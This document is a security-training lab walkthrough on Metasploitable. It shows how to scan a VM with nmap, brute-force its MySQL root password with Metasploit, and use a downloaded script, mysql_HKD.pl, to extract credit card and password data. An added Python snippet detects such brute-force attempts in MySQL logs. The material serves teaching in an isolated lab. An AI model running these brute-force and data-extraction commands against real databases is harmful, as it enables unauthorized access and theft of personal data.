ComputerSecurityStudent (CSS)

(Metasploitable Project: Lesson 11)

{ MySQL Bruteforce Password Guessing, Obtain Sensitive Data }


Section 0. Background Information
  1. What is the scenario?
    • Have you ever heard stories of how hackers were able to break into databases remotely and retrieve sensitive information? This lesson illustrates how easily and quickly sensitive information can be obtained if the database administrator's password is in a dictionary.

  2. What is Metasploitable 
  3. Pre-Requisite Lab
  4. What is auxiliary/scanner/mysql/mysql_login?
    • This Metasploit module simply queries the MySQL instance for a specific
      user/pass (default is root with blank).

  5. What is mysql_HKD.pl?
    • This is a MySQL post-exploitation tool used after you have discovered the database password with a tool like Metasploit's MySQL Login Utility.
    • It can search every database, table, and field for sensitive strings containing words like "credit card" or "password", or whatever else you want to search for.

  6. Lab Notes
    • In this lab we will do the following:
      1. Run a basic NMAP scan.
      2. Run an NMAP scan using service version detection.
      3. Look for the mysql daemon in both NMAP scans.
      4. Use Metasploit to correctly guess the MySQL root password.
      5. Use mysql_HKD.pl to obtain sensitive information.

  7. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2015 No content replication of any kind is allowed without express written permission.

 

Section 1: Start Up the Metasploitable VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer

     

  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine

     

  3. Open the Metasploitable VM
    • Instructions:
      1. Navigate to where the Metasploitable VM is located
      2. Click on the Metasploitable VM
      3. Click on the Open Button

     

  4. Edit the Metasploitable VM
    • Instructions:
      1. Select Metasploitable2-Linux VM
      2. Click Edit virtual machine settings

     

  5. Edit the Metasploitable VM
    • Instructions:
      1. Click on "Network Adapter NAT"
      2. Select the radio button "Bridged: Connected directly to the physical network"
      3. Click on the OK button
    • Warning:
      • Changing from NAT to Bridged exposes the VM and your network to potential attacks.
      • To maintain a safe network, you could (1) skip this section and only use the host-only network, (2) unplug your router from the internet, or (3) use an ACL to not allow traffic into your network, etc.

     

  6. Play the Metasploitable VM
    • Instructions:
      1. Click on the Metasploitable VM
      2. Click on Play virtual machine

 

Section 2: Determine Metasploitable IP Address
  1. Logging into Metasploitable
    • Instructions
      1. Username: msfadmin
      2. Password: msfadmin or whatever you changed it to in lesson 1.

     

  2. Retrieve IP Address
    • Instructions:
      1. ifconfig
      2. Record Your Metasploitable IP Address.
    • Note(FYI):
      • This is the IP Address of the Victim Machine.
      • My IP Address is 192.168.1.116.
      • Record your IP Address.

     

Section 4: Start Up the BackTrack5R1 VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer

     

  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine

     

  3. Open the BackTrack5R1 VM
    • Instructions:
      1. Navigate to where the BackTrack5R1 VM is located
      2. Click on the BackTrack5R1 VM
      3. Click on the Open Button

     

  4. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  5. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

     

  6. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  7. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  8. Bring up the GNOME
    • Instructions:
      1. Type startx

     

  9. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  10. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
      2. Record your IP Address (See Picture)
    • Note(FYI):
      • My IP address is 192.168.1.139.
      • In your case, it will probably be different.
      • This is the machine that will be used to attack the victim machine (Metasploitable).

 

Section 5: Set MySQL Password
  1. Become Root (On Metasploitable)
    • Instructions:
      1. sudo su -
      2. Enter the password: msfadmin or whatever you changed it to in lesson 1.
    • Note(FYI):
      • sudo allows a permitted user to execute a command either as themselves or as another user.
      • su - switches user. If you don't supply a username after the "-", root is assumed.

     

  2. Set MySql Database root password
    • Instructions:
      1. mysqladmin -uroot password msfadmin
      2. mysql -uroot -pmsfadmin -e 'show databases;'
    • Note(FYI):
      • The MySQL root password is set to blank by default in this Metasploitable VM.
      • mysqladmin is used to set the root password to msfadmin
      • mysql is used to log into the MySQL database.  In this case, we use the -e option to execute the following command (show databases) and exit.

     

Section 6: Scanning the Victim with NMAP
  1. Run Basic NMAP Scan against the Metasploitable VM  (On BackTrack)
    • Note(FYI):
      • Replace (192.168.1.116) with your Metasploitable VM's IP address obtained from [Section 2, Step 2].
    • Instructions:
      1. nmap 192.168.1.116
      2. Notice nmap shows that mysql is running on 3306/tcp.
    • Note(FYI):
      • nmap is being used to scan the TCP ports for listening services.
      • This is useful, but it would be nice to know the version of each service.

     

  2. NMAP Version Scan
    • Note(FYI):
      • Replace (192.168.1.116) with your Metasploitable VM's IP address obtained from (Section 2, Step 2).
    • Instructions:
      1. nmap -sV 192.168.1.116
      2. Notice nmap shows that mysql is running on 3306/tcp.
    • Note(FYI):
      • nmap -sV is used to detect the version of each service.  It will take a while to run.
      • You can use version information to search places like http://www.exploit-db.com. In our case, we will use Metasploit to guess the password and mysql_HKD.pl to pull sensitive information.

 

Section 7: Create Password File
  1. Create Password File (On BackTrack)
    • Instructions:
      1. cd /var/tmp
      2. grep -v "^#" /pentest/passwords/john/password.lst | head > pw.txt
      3. echo "msfadmin" >> pw.txt
      4. cat pw.txt
    • Note(FYI):
      1. Use cd to change directory to the /var/tmp directory.
      2. Use grep to ignore (-v) any line in the password.lst file that begins (^) with a pound sign (#).
      3. Use head to display the first 10 lines of that filtered password.lst output.
      4. Use the redirect operator (>) to send the output of instruction #2 into a new file called pw.txt.
      5. Use echo to display the string (msfadmin) and use the append operator (>>) to add (msfadmin) to the end of the pw.txt file.
      6. Use cat to display the contents of the pw.txt file.  This is the file that metasploit will use to guess the MySQL root password.

 

Section 8: Attacking the Victim with Metasploit
  1. Start Up Metasploit msfconsole (On BackTrack)
    • Instructions:
      1. msfconsole
    • Note(FYI):
      • Metasploit takes about 5 to 20 seconds to start up.

     

  2. msfconsole screen
    • Note(FYI):
      • This is the msfconsole
      • Your banner picture (Rabbit, Cow, Graffiti, Cyber Missile, etc.) will probably be different than mine.

     

  3. Search for Metasploit Module
    • Instructions:
      1. search mysql
      2. Highlight and Right Click on auxiliary/scanner/mysql/mysql_login
      3. Select Copy

     

  4. Set Metasploit Module
    • Instructions:
      1. use auxiliary/scanner/mysql/mysql_login
      2. show options
      3. In the following steps we will set PASS_FILE and RHOSTS

     

  5. Set the PASS_FILE and RHOSTS
    • Note(FYI):
      • Replace (192.168.1.116) with your Metasploitable VM's IP address obtained from (Section 2, Step 2).
    • Instructions:
      1. set PASS_FILE /var/tmp/pw.txt
      2. set RHOSTS 192.168.1.116
      3. set USERNAME root
      4. show options
    • Note(FYI):
      1. PASS_FILE is set to a file that contains possible MySQL passwords.
      2. RHOSTS is set to Metasploitable's IP Address.
      3. USERNAME is set to root.  If we can guess the root password, then we can collect whatever we want.

     

  6. Brute Force MySQL Password
    • Instructions:
      1. exploit
      2. Notice the root password (msfadmin) was successfully guessed.
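Added example (defender's side; not part of this lesson or of Metasploit): the guessing run above leaves one "Access denied" line per wrong password in the MySQL error log, and this Python parses such lines and flags any source that reaches five failures within a minute. The log lines are constructed, and the format assumes a MySQL 5.x server configured to log failed logins (log_warnings above 1).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches a MySQL 5.x error-log line for a failed login. Assumption: the server
# logs them (log_warnings > 1 on 5.x). MySQL 5.0 pads a single-digit hour with
# a space, which the \s+ absorbs.
FAILED_RE = re.compile(
    r"^(\d{6}\s+\d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'([^']*)'@'([^']+)' \(using password: (?:YES|NO)\)"
)

# Constructed sample log (not captured from Metasploitable): six root failures
# from one host within three seconds, plus one unrelated failure.
SAMPLE_LOG = "\n".join(
    ["150301 10:15:0%d [Warning] Access denied for user 'root'@'192.168.1.139' "
     "(using password: YES)" % s for s in (1, 1, 2, 2, 3, 3)]
    + ["150301  9:40:10 [Warning] Access denied for user 'webapp'@'192.168.1.50' "
       "(using password: YES)"]
)


def parse_failures(log_text):
    """Return a list of (timestamp, user, host) for each failed-login line."""
    hits = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(" ".join(m.group(1).split()), "%y%m%d %H:%M:%S")
            hits.append((ts, m.group(2), m.group(3)))
    return hits


def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Map (host, user) -> total failures for every source that reaches
    `threshold` failed logins inside any `window`-long span (sliding window)."""
    by_source = defaultdict(list)
    for ts, user, host in parse_failures(log_text):
        by_source[(host, user)].append(ts)
    alerts = {}
    for key, times in by_source.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1          # drop failures older than the window
            if end - start + 1 >= threshold:
                alerts[key] = len(times)
                break
    return alerts
```

Running find_bruteforce(SAMPLE_LOG) reports the root@192.168.1.139 source and leaves the single webapp failure alone; on a real host, point it at the server's error log instead of SAMPLE_LOG.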

 

Section 9: Obtain Sensitive Data with mysql_HKD.pl
  1. Download mysql_HKD.pl
    • Note(FYI):
      • By continuing to download and use mysql_HKD.pl you agree with the Computer Security Student, LLC Legal Agreement.
    • Instructions:
      1. cd /var/tmp
      2. wget http://www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson11/mysql_HKD.pl.TXT
      3. mv mysql_HKD.pl.TXT mysql_HKD.pl
      4. chmod 700 mysql_HKD.pl
      5. ls -l mysql_HKD.pl
    • Note(FYI):
      1. Use cd to change directory into the /var/tmp directory.
      2. Use wget to download mysql_HKD.pl.TXT
      3. Use mv to rename mysql_HKD.pl.TXT -to- mysql_HKD.pl
      4. Use chmod to give the owner of mysql_HKD.pl read(4), write(2), and execute(1) permissions (7), and no permissions to group and others (00).
      5. Use ls to list the details (-l) of the mysql_HKD.pl file.

     

  2. Execute mysql_HKD.pl (Search for string credit)
    • Note(FYI):
      • By continuing to download and use mysql_HKD.pl you agree with the Computer Security Student, LLC Legal Agreement.
    • Instructions:
      1. ./mysql_HKD.pl -ip 192.168.1.116 -u root -pw msfadmin -s "credit"
      2. Notice how mysql_HKD.pl displays all the database or tables or fields that contain the string (credit).
      3. Notice how mysql_HKD.pl displays all the sensitive content from the database tables that it found possible credit card information in.
    • Note(FYI):
      1. mysql_HKD.pl is used to search for and obtain sensitive information from a MySQL database, assuming you used some other tool like Metasploit to retrieve the root password.
      2. -ip 192.168.1.116, allows you to specify the IP address where the MySQL database is located. (E.g., Metasploitable)
      3. -u root, allows you to specify any MySQL userID.
      4. -pw msfadmin, allows you to specify the guessed password.
      5. -s "credit", allows you to specify a search string.

     

  3. Execute mysql_HKD.pl (Search for string password)
    • Note(FYI):
      • By continuing to download and use mysql_HKD.pl you agree with the Computer Security Student, LLC Legal Agreement.
    • Instructions:
      1. ./mysql_HKD.pl -ip 192.168.1.116 -u root -pw msfadmin -s "password"
      2. Notice how mysql_HKD.pl displays all the database or tables or fields that contain the string (password).
      3. Notice how mysql_HKD.pl displays all the sensitive content from the database tables that it found possible credit card information in.
    • Note(FYI):
      1. -ip 192.168.1.116, allows you to specify the IP address where the MySQL database is located. (E.g., Metasploitable)
      2. -u root, allows you to specify any MySQL userID.
      3. -pw msfadmin, allows you to specify the guessed password.
      4. -s "password", allows you to specify a search string.

     

  4. Execute mysql_HKD.pl (Search for string credit|password)
    • Note(FYI):
      • By continuing to download and use mysql_HKD.pl you agree with the Computer Security Student, LLC Legal Agreement.
    • Instructions:
      1. ./mysql_HKD.pl -V -ip 192.168.1.116 -u root -pw msfadmin -s "credit|password"
    • Note(FYI):
      1. -V, allows you to display verbose details to the screen.
      2. -ip 192.168.1.116, allows you to specify the IP address where the MySQL database is located. (E.g., Metasploitable)
      3. -u root, allows you to specify any MySQL userID.
      4. -pw msfadmin, allows you to specify the guessed password.
      5. -s "credit|password", allows you to search for multiple strings by placing a "|" between them.

     

Section 10: Proof of Lab
  1. Proof of Lab (On BackTrack)
    • Instructions
      1. cd /var/tmp
      2. ls -l mysql_hkd.txt*
      3. wc -l mysql_hkd.txt*
      4. tail -7 mysql_hkd.txt_credit
      5. date
      6. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press the <Ctrl> and <Alt> key at the same time.
      2. Press the <PrtScn> key.
      3. Paste into a word document
      4. Upload to Moodle

